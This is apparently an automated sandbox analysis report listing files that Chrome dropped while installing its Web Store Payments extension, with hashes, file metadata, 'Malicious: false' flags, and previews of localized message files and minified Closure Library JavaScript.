Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	615
Entropy (8bit):	4.4715318546237315
Encrypted:	false
SSDEEP:	12:1HEJJQGkbGGJQGkb+WYpU34OQKJT+dgiXUmvFZO8ZpU34g7JT03OyZnLAOfTYMD:1HErxkaqxk6WYptndXI8ZpTOGAOfbD
MD5:	7A8F9D0249C680F64DEC7650A432BD57
SHA1:	53477198AEE389F6580921B4876719B400A23CA1
SHA-256:	92BE7C2DC9CFBE5A65E9CE6488D364C8D7EC19E7B67A31E4D43C1CB2B169671C
SHA-512:	969AB979546A741C0F3EDBEEB21BABA375FA8870D4FB9248CDD4C305736E332E10CAB7B64C5C078E60EC0CD73848101B390BE8F44B89C310058AF4C1CA3C8AA7
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Betalingen via Chrome Web Store".. },.. "app_name": {.. "message": "Betalingen via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App momenteel niet beschikbaar.".. },.. "craw_connect_to_network": {.. "message": "Maak verbinding met een netwerk.".. },.. "iap_unavailable": {.. "message": "In-app-betalingen is momenteel niet beschikbaar.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log in bij Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	636
Entropy (8bit):	4.646901997539488
Encrypted:	false
SSDEEP:	12:1HEJbiVbGGbiVb+WYpU34OBHlBi9+dgQUg6O8ZpU34bdbfiIu03OyZnLAOfTYR5k:1HE5iVauiV6WYpIAYr8ZpxFiaOGAOfIC
MD5:	0E6194126AFCCD1E3098D276A7400175
SHA1:	E8127B905A640B1C46362FA6E1127BE172F4A40F
SHA-256:	E2699F98C511B18A2AFB82EAE9A4804B646C4FF1077D80E77C17A3943A6373C2
SHA-512:	A71F7C7BFBBF1E37E699601AF2E095C56CBA91F90CB7556477DF31D01B83ADFB1271E1775C9BA299FF6875BBFC2B6AB47488CC88E33DEF2F6F2E0E5AC687B777
Malicious:	false
Preview:	{.. "app_description": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "app_name": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplikacja jest obecnie niedost.pna.".. },.. "craw_connect_to_network": {.. "message": "Po..cz si. z sieci..".. },.. "iap_unavailable": {.. "message": "P.atno.ci w ramach aplikacji s. teraz niedost.pne.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Zaloguj si. w Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	636
Entropy (8bit):	4.515158874306633
Encrypted:	false
SSDEEP:	12:1HEJsc/bGGsc/b+WYpU34OLw+dgn/KzO8ZpU34FjIBMwGRO03OyZnLAOfTYN+KcY:1HEb/a8/6WYp4mZ8Zp7cKlOGAOf2tD
MD5:	86A2B91FA18B867209024C522ED665D5
SHA1:	63DEC245637818C76655E01FCB6D59784BC7184E
SHA-256:	6374880FDD1F8AF1EE8AEA6A06B73BE0AB265AFCEB4FE6F08BDE3B3989264B21
SHA-512:	DA6DBDE5028756421C2904F605632EE98831A25A1247E6238A931629B94CE8A00FD76F4235F118D2167304BD60F2C06B2AD78E54FF6CE53F8C38DF8C7B5AFCE4
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pagamentos da Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos da Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplicativo indispon.vel no momento.".. },.. "craw_connect_to_network": {.. "message": "Conecte-se a uma rede.".. },.. "iap_unavailable": {.. "message": "No momento, os Pagamentos no aplicativo n.o est.o dispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Fa.a login no Google Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	622
Entropy (8bit):	4.526171498622949
Encrypted:	false
SSDEEP:	12:1HEJsZUkbGGsZUkb+WYpU34OAE+dgqxKzO8ZpU34rEpBfvPO03OyZnLAOfTYLD:1HEmUka5Uk6WYpFvdxZ8ZpSTnPlOGAOS
MD5:	750A4800EDB93FBE56495963F9FB3B94
SHA1:	8BFB915488A4EB3CB33D68E2E59F1F8447DB7D61
SHA-256:	C1C94F65FABAF17DEF98A8587711A56D61B1E5607500E9B01F2824DB109F9E83
SHA-512:	2AEDEF5793406221BE76AF22031CE8C30AB5FAEAED09BB394C153E2EBE990C89C1A2A73B40D8A92842641AFCA8C77FFD808A2058602D3646FD8DAE2844406F24
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pagamentos via Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplica..o atualmente indispon.vel.".. },.. "craw_connect_to_network": {.. "message": "Ligue-se a uma rede.".. },.. "iap_unavailable": {.. "message": "Os Pagamentos na app est.o atualmente indispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicie sess.o no Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	641
Entropy (8bit):	4.61125938671415
Encrypted:	false
SSDEEP:	12:1HEJqJrJZGGqJrJZ+WYpU344HIx2Z+dgrVPlZO8ZpU34qT7hI3O03OyZnLAOfTYU:1HEC4D8WYpKow8WV68ZpKhoOGAOfoVGD
MD5:	98D43E4B1054A65DF3FA3CC40AB6FB6D
SHA1:	46E0A21C4DA2BB5D4D8F837AE211C1B6FA26E7E2
SHA-256:	113A13900CBA62FE8AED06751971C23A80A99B47F9BE219CF884D57DB19611D9
SHA-512:	A76DC53912A4F46714926B9EA2B22E909540E447F61F6DD72607AB7B3BB5D4A9B39E525B04C33AEC53BA813D14AC1FB5827275B2524E52B693E83171E1CD1466
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "app_name": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "craw_app_unavailable": {.. "message": ".n prezent, aplica.ia nu este disponibil..".. },.. "craw_connect_to_network": {.. "message": "Conecteaz.-te la o re.ea.".. },.. "iap_unavailable": {.. "message": "Pl..ile .n aplica.ie nu sunt disponibile momentan.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Conecteaz.-te la Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	744
Entropy (8bit):	4.918620852166656
Encrypted:	false
SSDEEP:	12:1HEJ7OJHZMSl3ZGG7OJHZMSl3Z+WYpU34zWJ2F+dgVtLSv/TO8ZpU347NWjT03On:1HElOJHZMq4uOJHZMq8WYpdWJ/YGHq8m
MD5:	DB2EDF1465946C06BD95C71A1E13AE64
SHA1:	FB4F3ECE9ECECEBBC6CA2A592A15FB9C1FDFB811
SHA-256:	FBAF22CE6E16DE174CED8CB5EA3098CCA1C3426A2111FF33BD3E64DA64ED67AB
SHA-512:	4E0CF00BAEF1757548DEB17BBE1AF55770A0A0F7351779EF55C7DEFA6D112D0227B8865C2C22E0EC62E6E2F1C8E1632A2D0CE6828D25C5ABBF143C990116F632
Malicious:	false
Preview:	{.. "app_description": {.. "message": "......... ....... ........-........ Chrome".. },.. "app_name": {.. "message": "......... ....... ........-........ Chrome".. },.. "craw_app_unavailable": {.. "message": ".......... ...........".. },.. "craw_connect_to_network": {.. "message": "............ . .....".. },.. "iap_unavailable": {.. "message": "....... ..... .......... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "....... . Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	4.640777810668463
Encrypted:	false
SSDEEP:	12:1HEJfZGGfZ+WYpU34ORO+dgmmCO8ZpU34yH7u2Z03OyZnLAOfTYCUAi0D:1HEl4G8WYpetPmD8ZpcH7aOGAOfzUeD
MD5:	8DF215D1EFBDABB175CCDD68ED8DCB0A
SHA1:	2B374462137A38589A73FDD00A84CBDC7E50F9F4
SHA-256:	7FA16AF97E6CFC52EC6008EB679D3F30E7E0C24F9EF2D18A9228EAF4DED9D63B
SHA-512:	C0E623343BDAEB4731800D183B59F2FCFE285F0C7153EC99641FD84F2F2DCFE47D21E73F3D28B1240340453C5668EB0AFFBE087AAB62F1C88CD2A40CC44E599D
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplik.cia moment.lne nie je dostupn..".. },.. "craw_connect_to_network": {.. "message": "Pripojte sa k sieti.".. },.. "iap_unavailable": {.. "message": "Platby v aplik.cii moment.lne nie s. k dispoz.cii.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prihl.ste sa do prehliada.a Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	617
Entropy (8bit):	4.5101656584816885
Encrypted:	false
SSDEEP:	12:1HEJGcyvmbZGGGcyvmbZ+WYpU34OBOEtf+dgca1ZO8ZpU34GcQArERff03OyZnLh:1HE4cyY4TcyY8WYpNoWa1w8ZpQcQ6AfK
MD5:	3943FA2A647AECEDFD685408B27139EE
SHA1:	0129DD19D28373359530B3B477FE8A9279DABB7D
SHA-256:	18AFF072EE0DF7C3495045435C752A805606E6D5D462EF2321C443F1773F4B3A
SHA-512:	42E62B3855611FF2E1D39C11404CB1A09825EE4CA6A8ACB3FF538B4574388F549E3BD79137DD4DC128A8DC44DD270D7D878E4AAD20DA8250A5C25297B0DEC09D
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "app_name": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenutno ni na voljo.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se z omre.jem.".. },.. "iap_unavailable": {.. "message": "Pla.ila v aplikacijah trenutno niso na voljo.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se v Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	743
Entropy (8bit):	4.913927107235852
Encrypted:	false
SSDEEP:	12:1HEJssbdOGGssbdO+WYpU347xBP+dgcucO8ZpU34s1muP03OyZnLAOfTYzDYD:1HEKsb59sbTWYplx4Xud8Zpy1mNOGAOv
MD5:	D485DF17F085B6A37125694F85646FD0
SHA1:	24D51D8642CDC6EFD5D8D7A4430232D8CDE25108
SHA-256:	7FFDE34C58E7C376C042DE64DEF6481DAE32BE8B70F0B18EDF536290CBE0C818
SHA-512:	0DDECFD860E99290B6C3AAA04F510272AE081CF2D93ED5832D9D6378EC9D36177FFBE213471247FB94721EA34A83E7665669200047091D0FDE134E3D763217E7
Malicious:	false
Preview:	{.. "app_description": {.. "message": "....... . Chrome ...-..........".. },.. "app_name": {.. "message": "....... . Chrome ...-..........".. },.. "craw_app_unavailable": {.. "message": ".......... .. ........ ...........".. },.. "craw_connect_to_network": {.. "message": "........ .. .......".. },.. "iap_unavailable": {.. "message": "....... . .......... .. ........ ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "......... .. . Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	630
Entropy (8bit):	4.52964089437422
Encrypted:	false
SSDEEP:	12:1HEJJMkbGGJMkb+WYpU34OACwz+dgNPGFZO8ZpU34JgpXLSb03OyZnLAOfTYLdID:1HErMkaqMk6WYpTOcb8ZpDgdZOGAOf8Y
MD5:	D372B8204EB743E16F45C7CBD3CAAF37
SHA1:	C96C57219D292B01016B37DCF82E7C79AD0DD1E8
SHA-256:	B8BA77E0089B0676545EC16D32468B727812B444F90B33A7A5B748E6C36C4388
SHA-512:	33640529E0D5DCC5CA4BDB0615A2818E8D26C6FCB7B3474C08AC3EB67B9DB40E1F0A79954ED20728CD47A686D2533DCBC76ABCBDB917F8530C8DE8BBA687352E
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Betalning via Chrome Web Store".. },.. "app_name": {.. "message": "Betalning via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Appen .r inte tillg.nglig f.r tillf.llet.".. },.. "craw_connect_to_network": {.. "message": "Anslut till ett n.tverk.".. },.. "iap_unavailable": {.. "message": "Betalning i appen .r inte tillg.ngligt f.r n.rvarande.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logga in i Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	945
Entropy (8bit):	4.801079428724355
Encrypted:	false
SSDEEP:	24:1HEKa1dDa1/WYp6UFi72SmlG8ZpyactrW2SAOGAOfvSLD:WK2DNYp6U4y3bpyLxwGFW
MD5:	83E2D1E97791A4B2C5C69926EFB629C9
SHA1:	429600425CB0F196DDD717F940E94DBD8BFF2837
SHA-256:	2FECA577F43D97BAEEA464741D585892103585208FD0A935B810A03BDCE83C88
SHA-512:	60A5928DAA8CB4341487F477C56B5A98B83EDE50E5F4F55A802E01FDDAB86F3E795D391953D3D9214552D14D3F58C5A183693C613720FC12FC387D7B8F9B9AB6
Malicious:	false
Preview:	{.. "app_description": {.. "message": "............... Chrome .........".. },.. "app_name": {.. "message": "............... Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".............................".. },.. "craw_connect_to_network": {.. "message": ".........................".. },.. "iap_unavailable": {.. "message": "...............................................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "................. Chrome".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	631
Entropy (8bit):	4.710869622361971
Encrypted:	false
SSDEEP:	12:1HEJ9Y8GG9Y8+WYpU34wWT+dgGb0GO8ZpU34wryd7T03OyZnLAOfTYGbPKG:1HE0jWYpyRnG8Zpyr/OGAOfFPn
MD5:	2CEAE0567B6BB1D240BBAD690A98CA3B
SHA1:	5944346FBD4A0797B13223895995CAB58E9ECD23
SHA-256:	A7CB86F30C9C31FE5540282C308BA96ADB4EC16EF98C87129EB88105E5BEF5FC
SHA-512:	108A07C6D03D7178E8D0FFEF5349E0249A898D864964FED8757BD8A08BC1C6D9613F2A6C01AA34A6606127D1C6CE14C229FA02586677DBB060B85E3E845950E1
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "app_name": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "craw_app_unavailable": {.. "message": "Uygulama .u anda kullan.lam.yor.".. },.. "craw_connect_to_network": {.. "message": "L.tfen bir a.a ba.lan.n.".. },.. "iap_unavailable": {.. "message": "Uygulama ..i .demeler .u anda kullan.lamaz.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.tfen Chrome'da oturum a..n.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	720
Entropy (8bit):	4.977397623063544
Encrypted:	false
SSDEEP:	12:1HEJ7wILkSlXZGG7wILkSlXZ+WYpU34zb1Oy2P+dgSV1EjiTO8ZpU347qtfP2CTW:1HElwEkK4uwEkK8WYpd/dTV1e8Zptq5S
MD5:	AB0B56120E6B38C42CC3612BE948EF50
SHA1:	8B3F520E5713D9F116D68E71DAEED1F6E8D74629
SHA-256:	68ABA284751EB9C856032062EF9B1651E2A1E5CE5FDA0977FFC97D63BA7BED9E
SHA-512:	CD852A58217F739C1CD58567FF432D31A7AD3F68C884ABBA1DA95799BCD1545C6A5D3B06F319681C12B78AD0A709828DE4B22736316F148D21F5DB76A5BCCBEF
Malicious:	false
Preview:	{.. "app_description": {.. "message": "....... ...-........ Chrome".. },.. "app_name": {.. "message": "....... ...-........ Chrome".. },.. "craw_app_unavailable": {.. "message": "........ ......... ...........".. },.. "craw_connect_to_network": {.. "message": "............. .. .......".. },.. "iap_unavailable": {.. "message": "....... ..... ........ ..... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "........ . Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	695
Entropy (8bit):	4.855375139026009
Encrypted:	false
SSDEEP:	12:1HEJMAZrSFZGGMAZrSFZ+WYpU34WFHoz+dgdklzoO8ZpU34NFHoz03OyZnLAOfTU:1HEI4B8WYpAKytFZ8ZpXKMOGAOfd6D
MD5:	7EBB677FEAD8557D3676505225A7249A
SHA1:	F161B4B6001AEAEAB246FF8987F4D992B48D47BE
SHA-256:	051F96ED874C11C4A13589B5F68964E4F5B03B52DDA223D56524F2CA23760C04
SHA-512:	74FD267CF7E299FB8E7054605C3F651F057F676FF865082FA24F4916755456768DB0DA62DBC515D829B48AB1F9CFC8AD3E841DCBF1F194D5CB14C5335A192A0D
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "app_name": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "craw_app_unavailable": {.. "message": ".ng d.ng hi.n kh.ng kh. d.ng.".. },.. "craw_connect_to_network": {.. "message": "Vui l.ng k.t n.i v.i m.ng.".. },.. "iap_unavailable": {.. "message": "Thanh to.n trong .ng d.ng hi.n kh.ng kh. d.ng.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Vui l.ng ..ng nh.p v.o Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	595
Entropy (8bit):	5.210259193489374
Encrypted:	false
SSDEEP:	12:1HEJ01GG01+WYpU34zeHz+dgfO8ZpU34YKiO03OyZnLAOfTYB6U:1HEpIWYpISv8Zp+JOGAOfa6U
MD5:	BB73BF561BB79F89D9BF7C67C5AE5C65
SHA1:	2FADD3A1959B29C44830033A35C637D0311A8C9C
SHA-256:	D804F2A040D21D7511EFD5213D8E1721D64964A1A0DBB48E21622CEEDC9D967E
SHA-512:	627D44CEF1FE5C5ABD598BD47FF5E22B9EFC1CF98DDE3868FA9E5896C134A0C9C055AC34EDDADAE56B6690E51AEA89965D38F770552A85C732CC796795DC68D2
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome .........".. },.. "app_name": {.. "message": "Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".........".. },.. "craw_connect_to_network": {.. "message": ".......".. },.. "iap_unavailable": {.. "message": "............".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	634
Entropy (8bit):	5.386215984611281
Encrypted:	false
SSDEEP:	12:1HEJ2j62GG2j62+WYpU34m7T+dgc8nOO8ZpU34mvIO03OyZnLAOfTYAuH:1HEuSZCWYpsStwP8ZpROGAOfCH
MD5:	5FF50C673CC0C661D615F0CFD0E6DCA0
SHA1:	60DFF98DEAB9C4746B288BDD9C94B3BCAE5EAA85
SHA-256:	C6F8C640F3353A7B9B1432A0C139C1AEEC40133800E6C9B467B63991AD660308
SHA-512:	361D62D91F4931C5F34092C9F2C6A5323D5EEB82A24E7ABE11F7817D8D66341C0ECAD4DCB4B10873920C8D6A3CC9F5704889E178EB2549001A9F62BEDF6C8019
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Chrome ............".. },.. "app_name": {.. "message": "Chrome ............".. },.. "craw_app_unavailable": {.. "message": ".............".. },.. "craw_connect_to_network": {.. "message": "......".. },.. "iap_unavailable": {.. "message": "................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	7780
Entropy (8bit):	5.791315351651491
Encrypted:	false
SSDEEP:	192:RktDNJ2UzsL5KcASyoH+CouKP/iNGRo/oRHMIT:AZQflcsU
MD5:	0834821960CB5C6E9D477AEF649CB2E4
SHA1:	7D25F027D7CEE9E94E9CBDEE1F9220C8D20A1588
SHA-256:	52A24FA2FB3BCB18D9D8571AE385C4A830FF98CE4C18384D40A84EA7F6BA7F69
SHA-512:	9AEAFC3ECE295678242D81D71804E370900A6D4C6A618C5A81CACD869B84346FEAC92189E01718A7BB5C8226E9BE88B063D2ECE7CB0C84F17BB1AF3C5B1A3FC4
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiZHUtdGRPdUNWcmxDY254Q0poRkg2NXpLU05vb1RiUE56bDNHbzdRMGJ3SSJ9LHsicGF0aCI6Il9sb2NhbGVzL2NhL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJ6ZGtWaF9XdkxJWlhkck5xWHBvSHNRMGh1ZGtSM2d1QlMzb2VsTEZLNklVIn0seyJwYXRoIjoiX2xvY2FsZXMvY3MvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6Ik9nUkNIZlVoam9xOU93NHFfaEhvTTQxNzNMelJyYkVpUVdsRXNRSzhscFkifSx7InBhdGgiOiJfbG9jYWxlcy9kYS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiN2JVWW1LYkhQUUNRMXBGcmUzTHJySEhwWk9xN1c2Zk5hT0laWmdKUERTTSJ9LHsicGF0aCI6Il9sb2NhbGVzL2RlL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJOV3FkU3Rfc1NFMm9KT2VuSUZtM0pMRm9iOGtBZ3ZTa3RtZGpCRGJWazdBIn0seyJwYXRoIjoiX2xvY2FsZXMvZWwvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6ImgyaEZ0YUJoLXJQUEtoUm00QkFWM0VEZmhFbnh5MElGOVhYT3Z0aHhlNjAifSx7InBhdGgiOiJfbG9jYWxlcy9lbi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoid0pSZDFmM3NxMERFVTJHLXd

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\craw_background.js

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	544643
Entropy (8bit):	5.385396177420207
Encrypted:	false
SSDEEP:	6144:abyfBNC2FRdjiRXqbe5Dq31IVlMqX+wd5/CcMMJcRULt0NjyTOEzZQ+h72W3GB0n:Ft/g
MD5:	6EEBED29E6A6301E92A9B8B347807F5F
SHA1:	65DFB69B650560551110B33DCBA50B25E5B876DE
SHA-256:	04CD9494B0ED83924DAD12202630B20D053D9E2819C8E826A386C814CC0A1697
SHA-512:	FEDE6DB31F2AD242E7BC7B52A8859BA7F466A0B920A8DADCB32DCFB5B2A2742E98B767FF22E0C5BC5C11FEC021240AA9E458486C9039EB4EBE5CF6AF7BE97BF2
Malicious:	false
Preview:	/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var d,e=e\|\|{};e.scope={};e.arrayIteratorImpl=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};e.arrayIterator=function(a){return{next:e.arrayIteratorImpl(a)}};e.ASSUME_ES5=!1;e.ASSUME_NO_NATIVE_MAP=!1;e.ASSUME_NO_NATIVE_SET=!1;e.SIMPLE_FROUND_POLYFILL=!1;e.ISOLATE_POLYFILLS=!1;e.FORCE_POLYFILL_PROMISE=!1;e.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.e.defineProperty=e.ASSUME_ES5\|\|"function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};e.getGlobal=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");};e.global=e.getGlobal(this);.e.IS_SYMBOL_NATIVE="func

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\craw_window.js

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	261316
Entropy (8bit):	5.444466092380538
Encrypted:	false
SSDEEP:	3072:I5vU7I6s2M9duIWFCbmYJ4tnFWdqpMad2vywhIp81QFv9F9nNsZgiDdOFlV/mZmc:I5vqFCb2p8Gx9FNNsZ9Dd/ceR
MD5:	1709B6F00A136241185161AA3DF46A06
SHA1:	33DA7D262FFED1A5C2D85B7390E9DBC830CBE494
SHA-256:	5721A4B3F8E09C869A629EFFD350B51C9D46F0AC136717D4DB6265C0EE6F9AC8
SHA-512:	26835B4C050F53AD2DDB84469DF9A84BBB2786A655AB52DFC20B54BEDCB81D1ECD789198D5B7D8B940242E5CEAC818A177444D402397AE82C203438C4B1D19CB
Malicious:	false
Preview:	/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var b,k=k\|\|{};k.scope={};k.createTemplateTagFirstArg=function(a){return a.raw=a};k.createTemplateTagFirstArgWithRaw=function(a,c){a.raw=c;return a};k.arrayIteratorImpl=function(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}};k.arrayIterator=function(a){return{next:k.arrayIteratorImpl(a)}};k.makeIterator=function(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):k.arrayIterator(a)};.k.arrayFromIterator=function(a){for(var c,d=[];!(c=a.next()).done;)d.push(c.value);return d};k.arrayFromIterable=function(a){return a instanceof 